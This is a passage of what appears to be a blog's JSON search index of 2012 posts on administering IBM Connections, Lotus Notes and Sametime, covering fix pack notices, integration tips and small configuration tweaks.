part will continue with IHS, i want to disable some parts, which comes with the default httpd.conf and are not used with connections.\n","excerpt":"\u003ch1 id=\"preamble\"\u003ePreamble \u003ca href=\"#preamble\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eBefore i begin with my securing article, i want to say something on\nsecurity on IBM Connections. Mainly i don’t like the thing, that IBM\nonly support very special versions of software.\u003c/p\u003e\n\u003cp\u003eSo we must use WebSphere 7.0.0.21, DB2 9.7.0.5, IHS 7.0.0.11 and so on.\nEach product had updates the last months and i think we won’t get\nsupport when we use other versions.\u003c/p\u003e\n\u003cp\u003eSo i have to chances. On the first side i can update my software to\nlimit vulnerabilities and get perhaps no support, or i will have\nvulerable software with support.\u003c/p\u003e\n\u003cp\u003eJust my 2 cent and i hope i will get answer, if i will get support with\nhigher program versions.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-10-26-hardening-connections-part-1-ibm-http-server/","title":"Hardening Connections – Part 1: IBM HTTP Server"},{"body":"I had an issue with daily newsletters in Connections 3.x, where newsletters were sent every 25 and not 24 hours.\nThis is fixed in Connections 4, now newsletters are arriving every 24 hours.\n","excerpt":"\u003cp\u003eI had an issue with daily newsletters in Connections 3.x, where\nnewsletters were sent every 25 and not 24 hours.\u003c/p\u003e\n\u003cp\u003eThis is fixed in Connections 4, now newsletters are arriving every 24\nhours.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-10-25-daily-newsletter-in-ibm-connections-4/","title":"Daily Newsletter in IBM Connections 4"},{"body":"Today IBM released CR1 on IBM Fixcentral. CR1 is a set of 17 cumulative fixes and enable Mobile Admin (didn’t verified this, hope it will be there) too.\nLinks for all CR1 Downloads (Multi OS Fixes)\nFix list for IBM Connections 4.0 CR1 – Very long, seems to fix a lot\nIBM Connections 4.0 CR1 Post-install Deployment Configuration Steps\nUpdate strategy for IBM Connections 4.0\nCross-product relationship information\nYou have to download 18 packages, because a new update installer is mandatory!\n","excerpt":"\u003cp\u003eToday IBM released CR1 on IBM Fixcentral. CR1 is a set of 17 cumulative\nfixes and enable Mobile Admin (didn’t verified this, hope it will be\nthere) too.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eLinks for all CR1 Downloads (Multi OS Fixes)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix list for IBM Connections 4.0 CR1 – Very long, seems to fix a lot\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIBM Connections 4.0 CR1 Post-install Deployment Configuration Steps\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdate strategy for IBM Connections 4.0\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eCross-product relationship information\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eYou have to download 18 packages, because a new update installer is\nmandatory!\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/10/2012-10-23_2141.png\" alt=\"2012 10 23 2141\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-10-23-ibm-releases-cr1-for-ibm-connections-4-0/","title":"IBM releases CR1 for IBM Connections 4.0 and enable Mobile Admin"},{"body":"Looks very interesting! Hope i get new stuff for configuring Lotus Traveler HA and IBM Connections. High Availability and Disaster Recovery Options for DB2 Linux, UNIX, and Windows ","excerpt":"\u003cp\u003eLooks very interesting! Hope i get new stuff for configuring Lotus\nTraveler HA and IBM Connections. \u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.redbooks.ibm.com/redpieces/abstracts/sg247363.html?Open\" target=\"_blank\"\u003eHigh Availability and Disaster Recovery Options for DB2 Linux, UNIX, and Windows \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-09-28-redbook-draft-high-availability-and-disaster-recovery-options-for-db2-linux-unix-and-windows/","title":"Redbook Draft: High Availability and Disaster Recovery Options for DB2 Linux, UNIX, and Windows"},{"body":"FP3 and IF1 for FP2 bring Mountain Lion Support (Mac OS X 10.8) to Lotus Notes.\nhttp://www-01.ibm.com/support/docview.wss?uid=swg21599884\u0026myns=swglotus\u0026mynp=OCSSKTWP\u0026mync=R ","excerpt":"\u003cp\u003eFP3 and IF1 for FP2 bring Mountain Lion Support (Mac OS X 10.8) to Lotus\nNotes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21599884\u0026amp;myns=swglotus\u0026amp;mynp=OCSSKTWP\u0026amp;mync=R\" target=\"_blank\"\u003ehttp://www-01.ibm.com/support/docview.wss?uid=swg21599884\u0026myns=swglotus\u0026mynp=OCSSKTWP\u0026mync=R \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-09-28-lotus-notes-8-5-3-fp2-if1-offer-mountain-lion-support/","title":"Lotus Notes 8.5.3 FP2 IF1 offer Mountain Lion Support"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mac-os-x/","title":"Mac OS X"},{"body":"Partha’s Place == McGimp 2.8 (Native Mac Gimp 2.8)\nIntroducing the Mac version of Gimp 2.8. This is a native Mac version of Gimp that works just like any other Mac application.\nGreat app with tons of functions and now as a native Mac OS X App.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.partha.com/\" target=\"_blank\"\u003ePartha’s Place \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e== McGimp 2.8 (Native Mac Gimp 2.8)\u003c/p\u003e\n\u003cp\u003eIntroducing the Mac version of Gimp 2.8. This is a native Mac version of\nGimp that works just like any other Mac application.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eGreat app with tons of functions and now as a native Mac OS X App.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-26-mcgimp-2-8-gimp-2-8-as-a-native-mac-os-x-app/","title":"McGimp 2.8 – Gimp 2.8 as a native Mac OS X App"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-sametime/","title":"HCL Sametime"},{"body":"The last days i used to integrate Sametime in IBM Connections. I did this a few times the last two years, but i used ST 8.5.1 and older Connections Versions.\nFirst of all, it is much easier to apply now. You mustn’t add Proxy entries to your IHS (IBM HTTPServer) or activate awareness lookup in profiles-config.xml – BUT you have to install exactly the right versions.\nI mapped the wc_defaultport of Sametime Proxy to 80 and 443, so i mustn’t have special thoughts on firewalls. Now i checked out uiextensions-config.xml and added the URL of my Sametime Proxy Server. A good description can be found in Connections Wiki .\nWhen you only install IFR 1 for IBM Sametime 8.5.2 the integration is working only 30%! The chat window appears, but awareness lookup is missing. I traced a lot and get error messages like: “Script is still running: http://webchat . mydomain.com/stbaseapi/proxyLoader.js?ver=STSU8.5.2.120111105.1050:8557 do you want to stop this script.”\nOn this point i got a hint of KBild , because he had a other build number of Sametime Proxy 8.5.2 working. So i found Sametime Proxy Server 8.5.2 IFR 1 fix for IBM Connections 3.0.1.1 and IBM WebSphere Portal 7.0.0.2 support and mobile enhancements , which told me to download the fix OBEN-8SRQTP from IBM Fix Central .\nAfter applying this 870 MB fix everything is working fine. Awareness lookup and chat window appear.\n","excerpt":"\u003cp\u003eThe last days i used to integrate Sametime in IBM Connections. I did\nthis a few times the last two years, but i used ST 8.5.1 and older\nConnections Versions.\u003c/p\u003e\n\u003cp\u003eFirst of all, it is much easier to apply now. You mustn’t add Proxy\nentries to your IHS (IBM HTTPServer) or activate awareness lookup in\nprofiles-config.xml – BUT you have to install exactly the right\nversions.\u003c/p\u003e\n\u003cp\u003eI mapped the wc_defaultport of Sametime Proxy to 80 and 443, so i\nmustn’t have special thoughts on firewalls. Now i checked out\nuiextensions-config.xml and added the URL of my Sametime Proxy Server. A\ngood description can be found in\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/%20Adding_Sametime_awareness_through_the_Sametime_server_ic301\" target=\"_blank\"\u003eConnections\nWiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-16-integrate-sametime-proxy-8-5-2-ifr-1-in-ibm-connections-3-0-1-1/","title":"Integrate Sametime Proxy 8.5.2 IFR 1 in IBM Connections 3.0.1.1"},{"body":"Since version 3.0 bookmarks (dogear) module of Connections can be configured to open bookmarks in a new window, but the configuration does not include bookmarks in the Community module.\nTo get this function consistent and it would be good, when IBM adds the dogear configure switch to communities too.\nUntil this, you can follow this:\nGo to [AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/tags\nEdit displaybookmark.tag and change following line:\n\u0026lt;a id=\u0026#34;b_uri_${bookmark.uuid}\u0026#34; href=\u0026#34;\u0026lt;tango:safeURL\u0026gt;${bookmark.uri}\u0026#34;\u0026gt; to\n\u0026lt;div id=\u0026#34;b_entry_${bookmark.uuid}\u0026#34;\u0026gt; \u0026lt;h4\u0026gt; \u0026lt;a target=\u0026#34;_blank\u0026#34; id=\u0026#34;b_uri_${bookmark.uuid}\u0026#34; href=\u0026#34;\u0026lt;tango:safeURL\u0026gt;${bookmark.uri}\u0026gt; \u0026lt;/a\u0026gt; \u0026lt;/h4\u0026gt; \u0026lt;/div\u0026gt; To recompile the jsps and activate this changes, edit and save the bookmarks.jsp.\nWindows Edit and save following files:\n[AppServer-Root]\\profiles\\[Communities-WAS]\\installedApps\\[cellname]\\Communities.ear\\comm.web.war\\WEB-INF\\jsps\\html\\scenes\\dashboard\\sidebarRight.jsp\n[AppServer-Root]\\profiles\\[Communities-WAS]\\installedApps\\[cellname]\\Communities.ear\\comm.web.war\\WEB-INF\\jsps\\html\\scenes\\bookmarks.jsp\nLinux: touch these files:\n[AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/jsps/html/scenes/dashboard/sidebarRight.jsp\n[AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/jsps/html/scenes/bookmarks.jsp\nI haven’t found a way to change opening links in new window in the rightsidebar “Important Bookmarks” and in Bookmarks Widget of the Community Overview. I think these links are generated through Javascript and Feedreader.\n","excerpt":"\u003cp\u003eSince version 3.0 bookmarks (dogear) module of Connections can be\nconfigured to open bookmarks in a new window, but the configuration does\nnot include bookmarks in the Community module.\u003c/p\u003e\n\u003cp\u003eTo get this function consistent and it would be good, when IBM adds the\ndogear configure switch to communities too.\u003c/p\u003e\n\u003cp\u003eUntil this, you can follow this:\u003c/p\u003e\n\u003cp\u003eGo to\n\u003ccode\u003e[AppServer-Root]/profiles/[Communities-WAS]/installedApps/[cellname]/Communities.ear/comm.web.war/WEB-INF/tags\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eEdit displaybookmark.tag and change following line:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;a \u003cspan style=\"color:#268bd2\"\u003eid\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;b_uri_\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uuid\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u0026lt;tango:safeURL\u0026gt;\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uri\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eto\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;div \u003cspan style=\"color:#268bd2\"\u003eid\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;b_entry_\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uuid\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;h4\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;a \u003cspan style=\"color:#268bd2\"\u003etarget\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;_blank\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eid\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;b_uri_\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uuid\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ehref\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u0026lt;tango:safeURL\u0026gt;\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e${\u003c/span\u003e\u003cspan style=\"color:#268bd2\"\u003ebookmark\u003c/span\u003e.uri\u003cspan style=\"color:#2aa198\"\u003e}\u003c/span\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#2aa198\"\u003e \u0026lt;/a\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#2aa198\"\u003e \u0026lt;/h4\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#2aa198\"\u003e\u0026lt;/div\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/08/Selection_003.png\" alt=\"Selection 003\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eTo recompile the jsps and activate this changes, edit and save the bookmarks.jsp.\u003c/p\u003e\n\u003ch1 id=\"windows\"\u003eWindows \u003ca href=\"#windows\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eEdit and save following files:\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-09-ibm-connections-open-communities-bookmarks-in-new-tab-or-window/","title":"IBM Connections – open Communities Bookmarks in new Tab or Window"},{"body":"Today i created a new mail rule in IBM Lotus Notes. I hate mails sent with high importance and i have some people which are sending all there mail with high importance!\nThe new traveler app adds “Dringend” to each mail marked with high importance. I read my mails all 10 to 20 minutes and i normally answer them in under two hours, but i do not answer faster, when i see a red “!”\nGet rid of this: I created a mail rule to remove the high importance tag. Thanks Notes!\n","excerpt":"\u003cp\u003eToday i created a new mail rule in IBM Lotus Notes. I hate mails sent\nwith high importance and i have some people which are sending all there\nmail with high importance!\u003c/p\u003e\n\u003cp\u003eThe new traveler app adds “Dringend” to each mail marked with high\nimportance. I read my mails all 10 to 20 minutes and i normally answer\nthem in under two hours, but i do not answer faster, when i see a red\n“!”\u003c/p\u003e\n\u003ch1 id=\"get-rid-of-this\"\u003eGet rid of this: \u003ca href=\"#get-rid-of-this\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/08/2012-08-08_15-18-38.png\" alt=\"2012 08 08 15 18 38\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI created a mail rule to remove the high importance tag. Thanks Notes!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-08-created-new-mail-rule/","title":"Created new mail rule"},{"body":"I think there is a wrong message in meeting delegation with comments function.\nWhen you delegate a meeting to someone else and add a comment, then the Comment window shows following info text:\n“The delegation notice will go out to the delegee and chair will receive the information about this delegation.”\nSo people who add a comment think the text will be sent to the person which get delegated. What do you think? Who will receive the comment?\nYes right, the chair will get it, not the delegee.\nI think this is very confusing for the users and perhaps they add comments which shouldn’t be read of the chair!\n","excerpt":"\u003cp\u003eI think there is a wrong message in meeting delegation with comments\nfunction.\u003c/p\u003e\n\u003cp\u003eWhen you delegate a meeting to someone else and add a comment, then the\nComment window shows following info text:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e“The delegation notice will go out to the delegee and chair will receive\nthe information about this delegation.”\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eSo people who add a comment think the text will be sent to the person\nwhich get delegated. What do you think? Who will receive the comment?\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eYes right, the chair will get it, not the delegee.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eI think this is very confusing for the users and perhaps they add\ncomments which shouldn’t be read of the chair!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-08-02-meeting-delegation-with-comments-notes-8-5-x/","title":"Meeting delegation with comments (Notes 8.5.x)"},{"body":"Today i installed Kudos at a customer site. As always i come to the point to add the Leaderboard Widget to Connections Homepage, so i mapped my user in ISC – Applications – Homepage – Map User roles to the Admin Role. The existing entry for wasadmin (a non ldap user) was still present after adding my account.\nI logged in to Connections Homepage, but Administration Tab was missing. When i call the Administration Link https://connections.customersite.com/homepage/admin/openAdminPage.action i get a not authorized message. Restarting homepage didn’t solve the issue.\nAfter some tests i removed the local wasuser from admin role and logged in again. And voilà i got a administration tab. Don’t know why this happened, i’m sure that i have other installations where i get a administration tab with a local user. I will investigate this the next days.\n","excerpt":"\u003cp\u003eToday i installed \u003ca href=\"http://www.kudosbadges.com\" target=\"_blank\"\u003eKudos \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n at a customer site.\nAs always i come to the point to add the Leaderboard Widget to\nConnections Homepage, so i mapped my user in ISC – Applications –\nHomepage – Map User roles to the Admin Role. The existing entry for\nwasadmin (a non ldap user) was still present after adding my account.\u003c/p\u003e\n\u003cp\u003eI logged in to Connections Homepage, but Administration Tab was missing.\nWhen i call the Administration Link\n\u003ca href=\"https://connections.customersite.com/homepage/admin/openAdminPage.action\" target=\"_blank\"\u003ehttps://connections.customersite.com/homepage/admin/openAdminPage.action \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\ni get a not authorized message. Restarting homepage didn’t solve the\nissue.\u003c/p\u003e\n\u003cp\u003eAfter some tests i removed the local wasuser from admin role and logged\nin again. And voilà i got a administration tab. Don’t know why this\nhappened, i’m sure that i have other installations where i get a\nadministration tab with a local user. I will investigate this the next\ndays.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-07-31-missing-administration-tab-in-ibm-connections-3-0-1-1-cr1/","title":"Missing Administration Tab in IBM Connections 3.0.1.1 CR1"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/android/","title":"Android"},{"body":"IBM releases a new version of Connections Mobile App. It looks good and works very smooth. Wiki integration is much better than in the old one. The new app supports multi Server Accounts.\nhttp://feeds.lbenitez.com/ r/SocializeMe/3/GZIIfL3uZho/demo-ibm-connections-mobile-app-for.html[Demo: IBM Connections Mobile App for Android]:\nIBM today released a new update for the IBM Connections App for Android mobile devices. (Via Socialize Me )\n","excerpt":"\u003cp\u003eIBM releases a new version of Connections Mobile App. It looks good and\nworks very smooth. Wiki integration is much better than in the old one.\nThe new app supports multi Server Accounts.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://feeds.lbenitez.com/\" target=\"_blank\"\u003ehttp://feeds.lbenitez.com/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003csub\u003er/SocializeMe/\u003c/sub\u003e3/GZIIfL3uZho/demo-ibm-connections-mobile-app-for.html[Demo:\nIBM Connections Mobile App for Android]:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIBM today released a new update for the IBM Connections App for Android\nmobile devices. \u003c/p\u003e\n\u003cp\u003e(Via \u003ca href=\"http://www.lbenitez.com/\" target=\"_blank\"\u003eSocialize Me \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n)\u003c/p\u003e\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2012/2012-06-08-ibm-connections-mobile-app-update-for-android-released/","title":"IBM Connections Mobile App Update for Android released"},{"body":"Cool day, thanks IBM.\nhttp://www-01.ibm.com/support/docview.wss?uid=swg21591682\u0026myns=swglotus\u0026mynp=OCSSYGQH\u0026mync=R ","excerpt":"\u003cp\u003eCool day, thanks IBM.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21591682\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003ehttp://www-01.ibm.com/support/docview.wss?uid=swg21591682\u0026myns=swglotus\u0026mynp=OCSSYGQH\u0026mync=R \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-05-11-ibm-knowledgebase-links-to-my-article/","title":"IBM Knowledgebase links to my article :)"},{"body":"New Mobile fix for IBM Connections available:\nhttp://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026product=ibm/Lotus/Lotus+Connections\u0026release=All\u0026platform=All\u0026function=fixId\u0026fixids=3.0.1.1-IC-Multi-Mobile-IFLO68457\u0026includeSupersedes=0\u0026source=fc ","excerpt":"\u003cp\u003eNew Mobile fix for IBM Connections available:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026amp;product=ibm/Lotus/Lotus\u0026#43;Connections\u0026amp;release=All\u0026amp;platform=All\u0026amp;function=fixId\u0026amp;fixids=3.0.1.1-IC-Multi-Mobile-IFLO68457\u0026amp;includeSupersedes=0\u0026amp;source=fc\" target=\"_blank\"\u003ehttp://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026product=ibm/Lotus/Lotus+Connections\u0026release=All\u0026platform=All\u0026function=fixId\u0026fixids=3.0.1.1-IC-Multi-Mobile-IFLO68457\u0026includeSupersedes=0\u0026source=fc \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-05-02-new-mobile-fix-for-ibm-connections-iflo68457/","title":"New Mobile Fix for IBM Connections IFLO68457"},{"body":"A few days ago a colleague asked me, why i use Notes only on my main display of the Macbook Pro. I didn’t remember the reason, but today i discovered it again.\nWhen i move my Notes Client window (8.5.3) on the second display, i can’t use column sorting when clicking on the column header. Then i moved the window bar (File, Edit, …) of Mac OS X (Lion) on the external monitor too and … I’m able to sort my inbox, when i click on the column header (like subject, date and so on).\nI played around a little bit and tested some other Mac OS Clients in the office and i can reproduce it. Only on displays with the windowbar i can change sorting, when i click on the column header.\nUpdate IBM acknowledged the problem: http://www.ibm.com/support/docview.wss?uid=swg21584595\u0026myns=swglotus\u0026mynp=OCSSKTWP\u0026mync=R ","excerpt":"\u003cp\u003eA few days ago a colleague asked me, why i use Notes only on my main\ndisplay of the Macbook Pro. I didn’t remember the reason, but today i\ndiscovered it again.\u003c/p\u003e\n\u003cp\u003eWhen i move my Notes Client window (8.5.3) on the second display, i\ncan’t use column sorting when clicking on the column header. Then i\nmoved the window bar (File, Edit, …) of Mac OS X (Lion) on the external\nmonitor too and … I’m able to sort my inbox, when i click on the column\nheader (like subject, date and so on).\u003c/p\u003e\n\u003cp\u003eI played around a little bit and tested some other Mac OS Clients in the\noffice and i can reproduce it. Only on displays with the windowbar i can\nchange sorting, when i click on the column header.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-04-04-lotus-notes-on-mac-os-change-column-sorting-broken-on-second-display-broken/","title":"Lotus Notes on Mac OS change column sorting broken on second display"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/macbook/","title":"Macbook"},{"body":"Please remember to backup your data!\n[…] When a hard drive fails and the data isn’t backed up, it’s gone. And it’s not a question of if your drive will fail, it’s when. Remember, every single computer component will fail eventually. […]\nRead more ","excerpt":"\u003cp\u003ePlease remember to backup your data!\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…] When a hard drive fails and the data isn’t backed up, it’s gone. And\nit’s not a question of if your drive will fail, it’s when. Remember,\nevery single computer component will fail eventually. […]\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.worldbackupday.com/\" target=\"_blank\"\u003eRead more \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-31-today-is-world-backup-day/","title":"Today is World Backup Day"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/admin/","title":"Admin"},{"body":"A very good cite on Sysadmins:\nIf you are rewarded for cleaning up after floods but not recognized for building flood prevention instead, pretty soon you start losing enthusiasm for trying to argue your bosses into funding that flood prevention.\nMore: http://utcc.utoronto.ca/~cks/space/blog/sysadmin/OpsHeroism ","excerpt":"\u003cp\u003eA very good cite on Sysadmins:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eIf you are rewarded for cleaning up after floods but not recognized for\nbuilding flood prevention instead, pretty soon you start losing\nenthusiasm for trying to argue your bosses into funding that flood\nprevention.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eMore: \u003ca href=\"http://utcc.utoronto.ca/~cks/space/blog/sysadmin/OpsHeroism\" target=\"_blank\"\u003ehttp://utcc.utoronto.ca/~cks/space/blog/sysadmin/OpsHeroism \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-29-flood-prevention/","title":"Flood prevention"},{"body":"There is a new Sametime Fix for integration in Connections 3.0.1.1 and portal 7.0.0.2: OBEN-8SRQTP\nVia http://www-01.ibm.com/support/docview.wss?uid=swg21588293 I installed Connections 3.0.1.1 with a Sametime Proxy 8.5.1 (like installation of 3.0.1) and it works.\n","excerpt":"\u003cp\u003eThere is a new Sametime Fix for integration in Connections 3.0.1.1 and\nportal 7.0.0.2: OBEN-8SRQTP\u003c/p\u003e\n\u003cp\u003eVia \u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21588293\" target=\"_blank\"\u003ehttp://www-01.ibm.com/support/docview.wss?uid=swg21588293 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eI installed Connections 3.0.1.1 with a Sametime Proxy 8.5.1 (like\ninstallation of 3.0.1) and it works.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-27-sametime-fix-oben-85dlgs-superseeded/","title":"Sametime Fix OBEN-85DLGS superseeded"},{"body":"The new fixpack for IBM Connections 3.0.1 is available. You can download the nearly 1 GB sized file on IBM Fixcentral. Fixlist and installation instructions are linked on Fix Central.\nUpdate Some details of the Readme :\nPrerequists WebSphere Application Server fixes: PM56596 and ​PM51310​ to WAS 7.0.0.x. Please contact IBM WebSphere Application Server support to obtain the fixes.​\nIntegration with Sametime 8.5.2 requires Sametime hotfix OBEN-8SDLGS. Please contact IBM Sametime support to obtain the fix.​\nSo no direct download of the prerequists! You have to contact IBM Support for these downloads.\nUpdate 21.03.2012 IBM changes the Readme for this Fixpack. They deleted the prerequisted WAS Fixes. So you can install without PM56596 and 